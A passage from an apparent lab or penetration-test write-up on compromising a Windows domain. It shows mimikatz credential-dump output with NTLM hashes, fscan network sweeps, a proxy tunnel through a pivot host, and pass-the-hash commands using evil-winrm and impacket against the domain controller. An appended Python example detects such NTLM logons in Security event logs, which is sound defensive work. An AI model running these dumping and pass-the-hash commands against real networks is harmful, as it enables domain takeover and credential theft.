Logon Server : WIN-1SJG2BFF54E
Logon Time : 2024/6/10 21:31:50
SID : S-1-5-21-495363149-4124706654-1579529781-1103
msv :
[00000003] Primary
* Username : weblogic
* Domain : C3TING
* NTLM : dee6489dfcd545e5a4b452fc9da06a0f
* SHA1 : f959b907a86ef967bcbed9dc24954695ecbe2fa8
[00010000] CredentialKeys
* NTLM : dee6489dfcd545e5a4b452fc9da06a0f
* SHA1 : f959b907a86ef967bcbed9dc24954695ecbe2fa8
tspkg :
wdigest :
* Username : weblogic
* Domain : C3TING
* Password : (null)
kerberos :
* Username : weblogic
* Domain : C3TING.ORG
* Password : (null)
ssp : KO
credman :

Authentication Id : 0 ; 350972 (00000000:00055afc)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/6/10 21:29:25
SID : S-1-5-90-2
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : WEBLOGIC$
* Domain : c3ting.org
* Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
ssp : KO
credman :

Authentication Id : 0 ; 350948 (00000000:00055ae4)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/6/10 21:29:25
SID : S-1-5-90-2
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : WEBLOGIC$
* Domain : c3ting.org
* Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
ssp : KO
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEBLOGIC$
Domain : C3TING
Logon Server : (null)
Logon Time : 2024/6/10 21:26:59
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : weblogic$
* Domain : C3TING.ORG
* Password : (null)
ssp : KO
credman :

Authentication Id : 0 ; 43688 (00000000:0000aaa8)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/6/10 21:26:53
SID :
msv :
[00000003] Primary
* Username : WEBLOGIC$
* Domain : C3TING
* NTLM : 46b27275c57726a026781f3ed621b4cb
* SHA1 : 09c31622476ba96b160a234c14707eba5b7dbc2b
tspkg :
wdigest :
kerberos :
ssp : KO
credman :

Authentication Id : 0 ; 538497 (00000000:00083781)
Session : CachedInteractive from 2
User Name : Administrator
Domain : C3TING
Logon Server : WIN-1SJG2BFF54E
Logon Time : 2024/6/10 21:33:21
SID : S-1-5-21-495363149-4124706654-1579529781-500
msv :
[00010000] CredentialKeys
* NTLM : 7ab183888ecafcccf897c4a5a59c8568
* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
[00000003] Primary
* Username : Administrator
* Domain : C3TING
* NTLM : 7ab183888ecafcccf897c4a5a59c8568
* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
tspkg :
wdigest :
* Username : Administrator
* Domain : C3TING
* Password : (null)
kerberos :
* Username : Administrator
* Domain : C3TING.ORG
* Password : (null)
ssp : KO
credman :

Authentication Id : 0 ; 496531 (00000000:00079393)
Session : Interactive from 2
User Name : Administrator
Domain : C3TING
Logon Server : WIN-1SJG2BFF54E
Logon Time : 2024/6/10 21:32:46
SID : S-1-5-21-495363149-4124706654-1579529781-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : C3TING
* NTLM : 7ab183888ecafcccf897c4a5a59c8568
* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
[00010000] CredentialKeys
* NTLM : 7ab183888ecafcccf897c4a5a59c8568
* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
tspkg :
wdigest :
* Username : Administrator
* Domain : C3TING
* Password : (null)
kerberos :
* Username : Administrator
* Domain : C3TING.ORG
* Password : (null)
ssp : KO
credman :

Authentication Id : 0 ; 264033 (00000000:00040761)
Session : Interactive from 1
User Name : Administrator
Domain : WEBLOGIC
Logon Server : WEBLOGIC
Logon Time : 2024/6/10 21:28:30
SID : S-1-5-21-2004965046-3923418856-647414055-500
msv :
tspkg :
wdigest :
kerberos :
ssp : KO
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/6/10 21:27:01
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp : KO
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEBLOGIC$
Domain : C3TING
Logon Server : (null)
Logon Time : 2024/6/10 21:26:53
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEBLOGIC$
* Domain : C3TING
* Password : (null)
kerberos :
* Username : weblogic$
* Domain : C3TING.ORG
* Password : (null)
ssp : KO
credman :

mimikatz(commandline) # exit
Bye!

From this we can tell we are now inside the domain environment C3TING.ORG

Tried to crack the plaintext password directly, but it did not work.

192.168.77.250 - PTH lateral movement

Upload fscan and scan the segment:

C:/Users/Public/Downloads/fscanPlus_amd64.exe -h 192.168.77.0/24 -p 1-65535 -nobr -o C:/Users/Public/Downloads/out.txt

-nobr -nopoc (skip brute forcing and web PoC scanning, to reduce traffic)

Information collected from the scan:

192.168.77.250:139 open
192.168.77.250:135 open
192.168.77.25:135 open
192.168.77.250:88 open
192.168.77.250:53 open
192.168.77.25:139 open
192.168.77.25:445 open
192.168.77.250:389 open
192.168.77.250:445 open
192.168.77.250:464 open
192.168.77.250:593 open
192.168.77.250:636 open
192.168.77.250:3268 open
192.168.77.250:3269 open
192.168.77.250:5985 open
192.168.77.25:5985 open
192.168.77.25:7001 open
192.168.77.25:7201 open
192.168.77.250:9389 open

Found a live host, 192.168.77.250:

Scan it again:

C:/Users/Public/Downloads/fscanPlus_amd64.exe -h 192.168.77.250 -o C:/Users/Public/Downloads/77_250.txt

Scan results:

192.168.77.250:88 open
192.168.77.250:135 open
192.168.77.250:445 open
192.168.77.250:139 open
[*] NetInfo
[*]192.168.77.250
[->]WIN-LAVRSND6J6N
[->]192.168.77.250
[*] OsInfo 192.168.77.250 (Windows Server 2012 R2 Standard 9600)
[*] NetBios 192.168.77.250 [+] DC:WIN-LAVRSND6J6N.c3ting.org Windows Server 2012 R2 Standard 9600

Summarizing the important information gathered above:

DC:
192.168.77.250
WIN-LAVRSND6J6N.c3ting.org

Username : Administrator
Domain   : C3TING
NTLM     : 7ab183888ecafcccf897c4a5a59c8568
SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9

Given the open ports above, we can move laterally straight through ports 5985 and 445, as follows:

But remember first to upload a stowaway tool to the 192.168.81.22 machine and build a tunnel into the 192.168.77.0/24 segment

Here I set the proxy port straight to port 12345 on the public IP:

socks5://公网ip:12345

PTH lateral movement over port 5985:

proxychains evil-winrm -i WIN-LAVRSND6J6N.c3ting.org -u administrator -H 7ab183888ecafcccf897c4a5a59c8568

Lateral movement successful.

PTH lateral movement over port 445:

proxychains impacket-smbexec C3TING/administrator@192.168.77.250 -hashes :7ab183888ecafcccf897c4a5a59c8568

proxychains impacket-psexec C3TING/administrator@192.168.77.250 -hashes :7ab183888ecafcccf897c4a5a59c8568

With that, all hosts have been taken.
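Added defender-side example (not part of the writeup): Python over constructed Security-log events showing how the two lateral moves above look on the domain controller. Both evil-winrm with -H and the impacket smbexec/psexec -hashes variants authenticate with NTLM, so the DC records a 4624 network logon (LogonType 3, package NTLM) for Administrator from the pivot host. Field names follow event 4624's EventData as collectors export it; the SID reuses the mimikatz output above; the jump-host allowlist and the sample events are assumptions.

```python
# Privileged accounts: the built-in Administrator by name or by RID 500.
PRIVILEGED_NAMES = {"administrator"}
PRIVILEGED_RID_SUFFIX = "-500"
# Constructed: the only host from which NTLM admin logons are sanctioned.
SANCTIONED_ADMIN_SOURCES = {"192.168.77.10"}


def classify_logon(ev: dict):
    """Return a finding for a privileged NTLM network logon, else None.

    Inside a domain, Kerberos is the normal package for network logons; a
    built-in Administrator logon negotiated over NTLM (LogonType 3, NtLmSsp)
    from an arbitrary host is how hash-replay tools appear on the target.
    """
    if ev.get("EventID") != 4624:
        return None
    user = ev.get("TargetUserName", "").lower()
    sid = ev.get("TargetUserSid", "")
    if user not in PRIVILEGED_NAMES and not sid.endswith(PRIVILEGED_RID_SUFFIX):
        return None
    if ev.get("LogonType") != 3 or ev.get("AuthenticationPackageName", "").upper() != "NTLM":
        return None
    src = ev.get("IpAddress", "")
    return {
        "severity": "info" if src in SANCTIONED_ADMIN_SOURCES else "high",
        "computer": ev.get("Computer", ""),
        "user": ev.get("TargetDomainName", "") + "\\" + ev.get("TargetUserName", ""),
        "source_ip": src,
        "workstation": ev.get("WorkstationName", ""),
        "logon_process": ev.get("LogonProcessName", ""),
    }


def scan_events(events):
    """Run classify_logon over a list of events and keep the findings."""
    return [f for f in (classify_logon(e) for e in events) if f is not None]


def _event(**overrides):
    """Constructed 4624 as the DC would log the lateral move above."""
    base = {"EventID": 4624, "Computer": "WIN-LAVRSND6J6N.c3ting.org", "LogonType": 3,
            "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp",
            "TargetUserName": "administrator", "TargetDomainName": "C3TING",
            "TargetUserSid": "S-1-5-21-495363149-4124706654-1579529781-500",
            "IpAddress": "192.168.77.25", "WorkstationName": "WEBLOGIC"}
    base.update(overrides)
    return base


SAMPLE_EVENTS = [
    _event(),                                                    # hash replayed from the pivot host
    _event(AuthenticationPackageName="Kerberos", LogonProcessName="Kerberos"),  # normal domain logon
    _event(IpAddress="192.168.77.10", WorkstationName="JUMP01"),  # NTLM, but from the sanctioned host
    _event(TargetUserName="weblogic",
           TargetUserSid="S-1-5-21-495363149-4124706654-1579529781-1103"),  # unprivileged user
    _event(EventID=4625),                                        # failed logon, out of scope here
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["severity"], f["user"], "from", f["source_ip"], "on", f["computer"])
```

The psexec/smbexec path additionally installs a service on the target (System event 7045), and evil-winrm leaves entries in the Microsoft-Windows-WinRM/Operational log; correlating either with the 4624 tightens the rule. On the prevention side, the "Network security: Restrict NTLM" policies and membership of the Protected Users group stop a stolen NTLM hash from being usable at all.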